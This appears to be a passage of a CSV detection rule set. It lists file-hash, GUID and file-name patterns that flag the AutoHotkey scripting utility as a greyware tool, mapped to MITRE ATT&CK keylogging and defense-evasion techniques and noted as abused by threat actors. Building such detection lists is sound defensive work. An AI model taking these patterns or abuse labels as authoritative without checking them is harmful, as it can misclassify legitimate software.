"*4e1e3123dd85d3ac65a0803b08dd89b9b12b5a00b9f566782855332d03e5fe26*",".{0,1000}4e1e3123dd85d3ac65a0803b08dd89b9b12b5a00b9f566782855332d03e5fe26.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*510a833bdd0f896cc398eaae4ff475f5b7cfe37649efbf647b50d21e442394b9*",".{0,1000}510a833bdd0f896cc398eaae4ff475f5b7cfe37649efbf647b50d21e442394b9.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*52a8249970f72966d7fae76ffc7fd4009ce4100e92ece3fd6c409c61943af492*",".{0,1000}52a8249970f72966d7fae76ffc7fd4009ce4100e92ece3fd6c409c61943af492.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*5eefcfc824818b2cdefcdf6719f5db13a4800434146f0b90ca3a30e2ad6e737f*",".{0,1000}5eefcfc824818b2cdefcdf6719f5db13a4800434146f0b90ca3a30e2ad6e737f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*60d86368165d01d88709d304757abcc642b0c165379438023fb3bc791a5b749f*",".{0,1000}60d86368165d01d88709d304757abcc642b0c165379438023fb3bc791a5b749f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*62613da1a6ac28989c8b3a7076bb90af9c9361cacd76c695c381140c1d9182db*",".{0,1000}62613da1a6ac28989c8b3a7076bb90af9c9361cacd76c695c381140c1d9182db.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*62734d219f14a942986e62d6c0fef0c2315bc84acd963430aed788c36e67e1ff*",".{0,1000}62734d219f14a942986e62d6c0fef0c2315bc84acd963430aed788c36e67e1ff.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*69b21d5a3d2bcc2b2b075d275a38f551997c45f28c9504995ede406aa101bead*",".{0,1000}69b21d5a3d2bcc2b2b075d275a38f551997c45f28c9504995ede406aa101bead.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*6f3663f7cdd25063c8c8728f5d9b07813ced8780522fd1f124ba539e2854215f*",".{0,1000}6f3663f7cdd25063c8c8728f5d9b07813ced8780522fd1f124ba539e2854215f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*6fe778623ef31eb224b4aeff3eaa73aef6d76c091fcb328782046e1ec44969d5*",".{0,1000}6fe778623ef31eb224b4aeff3eaa73aef6d76c091fcb328782046e1ec44969d5.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*700d65fb0b7653666b1ba1b3911f97ec9a6c6af647083dafd8609ffcf5499b4b*",".{0,1000}700d65fb0b7653666b1ba1b3911f97ec9a6c6af647083dafd8609ffcf5499b4b.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*704cd5aaaf2ad78e31ce1b7e13ff87c7b5e97bc5e2ef55188525eb7c96a53232*",".{0,1000}704cd5aaaf2ad78e31ce1b7e13ff87c7b5e97bc5e2ef55188525eb7c96a53232.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*7237594482ea47498b240d39ca8e94e3c635dc66fb4989db47739a8a420e6fc2*",".{0,1000}7237594482ea47498b240d39ca8e94e3c635dc66fb4989db47739a8a420e6fc2.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*7350f50c3fc022d217821e6f416497820e6216a714c5ee859af1f36be9b740d7*",".{0,1000}7350f50c3fc022d217821e6f416497820e6216a714c5ee859af1f36be9b740d7.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*76EFDEE3-81CF-4ADA-94DC-EA5509FF6FFC*",".{0,1000}76EFDEE3\-81CF\-4ADA\-94DC\-EA5509FF6FFC.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#GUIDproject","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*79d6da35083dc0008ed1da0396c561994822b84bc679d7d6193cd70b1ddce0ef*",".{0,1000}79d6da35083dc0008ed1da0396c561994822b84bc679d7d6193cd70b1ddce0ef.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*7a0dfa37846ead5afe73e4a8525eb1738d3b52c608291ba37088b0c037abde58*",".{0,1000}7a0dfa37846ead5afe73e4a8525eb1738d3b52c608291ba37088b0c037abde58.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*7b71b013061e80d7fa52560b061e142f9d7abf38d847da9d6871a90f8cbdc293*",".{0,1000}7b71b013061e80d7fa52560b061e142f9d7abf38d847da9d6871a90f8cbdc293.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*7e570c5aa02fb16d74433033fdcdd74f890d8eac26b9b94d24f600c9e48feacc*",".{0,1000}7e570c5aa02fb16d74433033fdcdd74f890d8eac26b9b94d24f600c9e48feacc.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*876dc6fecb7587bc98ed1702f11e01f19f7c56cd9703c76b7722e914e143280c*",".{0,1000}876dc6fecb7587bc98ed1702f11e01f19f7c56cd9703c76b7722e914e143280c.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*88c5d386c60a15d9758570e8b261f6b1d23248bd37d32b98cdf83ebc5223a266*",".{0,1000}88c5d386c60a15d9758570e8b261f6b1d23248bd37d32b98cdf83ebc5223a266.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*8dc4871ac544d2cd0ff7ccd84b8862eaf9ba0af18bd5b71e29146b17e4b13783*",".{0,1000}8dc4871ac544d2cd0ff7ccd84b8862eaf9ba0af18bd5b71e29146b17e4b13783.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*8e596f227367e273468b5833ab4169b6994bbfc5c1a2a3b85796a769f9444836*",".{0,1000}8e596f227367e273468b5833ab4169b6994bbfc5c1a2a3b85796a769f9444836.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*8e61b9221dd7aeab8c362c7d580eec35e192317bb8c645909e0ce95b91c1332a*",".{0,1000}8e61b9221dd7aeab8c362c7d580eec35e192317bb8c645909e0ce95b91c1332a.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*8f0ddf90f4cc44499bbeb0f2d3ff298cd5e5d206ca759535495ee767e83b6023*",".{0,1000}8f0ddf90f4cc44499bbeb0f2d3ff298cd5e5d206ca759535495ee767e83b6023.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*8f28c38a0b2af6ac96c4a7e1a2c0f296b2410f845d9aca8487843a1edac4271d*",".{0,1000}8f28c38a0b2af6ac96c4a7e1a2c0f296b2410f845d9aca8487843a1edac4271d.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*9195ca93854a739d434ec0ce62ef7b6fa159402624cd49b41a5ad1f3ad8f138b*",".{0,1000}9195ca93854a739d434ec0ce62ef7b6fa159402624cd49b41a5ad1f3ad8f138b.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*95142d0b33c50fe5fcdd5d9d1a1ec7951bf662b06f09d83438410cba625aa411*",".{0,1000}95142d0b33c50fe5fcdd5d9d1a1ec7951bf662b06f09d83438410cba625aa411.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*96af0b4438274122ca3a69e9556e91c3d2f05af16e74890dee567eebe3ac101a*",".{0,1000}96af0b4438274122ca3a69e9556e91c3d2f05af16e74890dee567eebe3ac101a.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*975722db63d783f39f712552dbed318d5e4e7e4a68c5822ad44edf79ba0afd5b*",".{0,1000}975722db63d783f39f712552dbed318d5e4e7e4a68c5822ad44edf79ba0afd5b.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*9871de1742c1132c9b3171c4ae970e66b6ebe3a6cf31c35db881a32e33cc4016*",".{0,1000}9871de1742c1132c9b3171c4ae970e66b6ebe3a6cf31c35db881a32e33cc4016.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*98ba5fe44ef68256a7e5692d45f2ad434b64eece32859ce3723803f36a6e4d55*",".{0,1000}98ba5fe44ef68256a7e5692d45f2ad434b64eece32859ce3723803f36a6e4d55.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*99eb1eb28b32a783c6619409988dc8fc70ecc9d1ebc05f286ec4c503d4853cbf*",".{0,1000}99eb1eb28b32a783c6619409988dc8fc70ecc9d1ebc05f286ec4c503d4853cbf.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*99ed8964fc153ac4984eb94f82bd51b2eda463d6483bb3e7e97d6d2b69b71196*",".{0,1000}99ed8964fc153ac4984eb94f82bd51b2eda463d6483bb3e7e97d6d2b69b71196.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*9b8c27cbcbae9c1ec6fe4265c15a9122806b0b0bf9d1173c499d7d2ccb714e17*",".{0,1000}9b8c27cbcbae9c1ec6fe4265c15a9122806b0b0bf9d1173c499d7d2ccb714e17.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*9c8b1aecaf1bdded80bec98ec5ab5b9b9754cbce9439dd9eacc7d1774d1438f8*",".{0,1000}9c8b1aecaf1bdded80bec98ec5ab5b9b9754cbce9439dd9eacc7d1774d1438f8.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*9f229bb988451fb20a2a307f6d6e598822a8e9bfa69dcf4b31fd67a7f7f4d3ad*",".{0,1000}9f229bb988451fb20a2a307f6d6e598822a8e9bfa69dcf4b31fd67a7f7f4d3ad.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*9f829612db928e5c7e7b08a9bf596b908d09c4f242b7454802e87dd2c2dc3f89*",".{0,1000}9f829612db928e5c7e7b08a9bf596b908d09c4f242b7454802e87dd2c2dc3f89.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*a1c31dc6e3e65461a52bb7f161f8c48e807ccd91d34f3382574d66314eac538d*",".{0,1000}a1c31dc6e3e65461a52bb7f161f8c48e807ccd91d34f3382574d66314eac538d.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*a32362b2769cb3cd8caa10722c50208b7170fe82d3663e85425df416422b4d22*",".{0,1000}a32362b2769cb3cd8caa10722c50208b7170fe82d3663e85425df416422b4d22.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*a6e07cccc0d66a5894500a057fe92440f1e372bda4856f148244ba369bf521de*",".{0,1000}a6e07cccc0d66a5894500a057fe92440f1e372bda4856f148244ba369bf521de.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*a7db865b054314d253293a1f427d3a155da5164060804aac431020e26a40e1ad*",".{0,1000}a7db865b054314d253293a1f427d3a155da5164060804aac431020e26a40e1ad.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*af7b8e60b4b54f5f85e6b207ac51926cb076aa4319b8e4c72e59b98c85818cae*",".{0,1000}af7b8e60b4b54f5f85e6b207ac51926cb076aa4319b8e4c72e59b98c85818cae.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*AutoHotkey/AutoHotkey*",".{0,1000}AutoHotkey\/AutoHotkey.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*AutoHotkeySC.bin*",".{0,1000}AutoHotkeySC\.bin.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*AutoHotkeyx.sln*",".{0,1000}AutoHotkeyx\.sln.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*AutoHotkeyx.vcxproj*",".{0,1000}AutoHotkeyx\.vcxproj.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*b04b1dc45652c59f82cecc30cf9aea76e5a1bd6cc3fecc450cef67cbcd825f06*",".{0,1000}b04b1dc45652c59f82cecc30cf9aea76e5a1bd6cc3fecc450cef67cbcd825f06.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*b0943f704ffc3830b8b900408b94e7a27434602dd34e9a831f81730bee4631a2*",".{0,1000}b0943f704ffc3830b8b900408b94e7a27434602dd34e9a831f81730bee4631a2.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*b5a13819d673e09534661f3f1c2f85f4cac71f020b8a6a64586ba829e2cd3fd4*",".{0,1000}b5a13819d673e09534661f3f1c2f85f4cac71f020b8a6a64586ba829e2cd3fd4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*b75fa5157fd2ff049b07259fde91ab3605f737827fb64fcbc373e2bd1779bb5d*",".{0,1000}b75fa5157fd2ff049b07259fde91ab3605f737827fb64fcbc373e2bd1779bb5d.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*c:\debug_clipboard_formats.txt*",".{0,1000}c\:\\debug_clipboard_formats\.txt.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*c36dd14fc322e1846a793797b758f5b0fb554f7f058da6a333c86f27cbf9ec01*",".{0,1000}c36dd14fc322e1846a793797b758f5b0fb554f7f058da6a333c86f27cbf9ec01.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
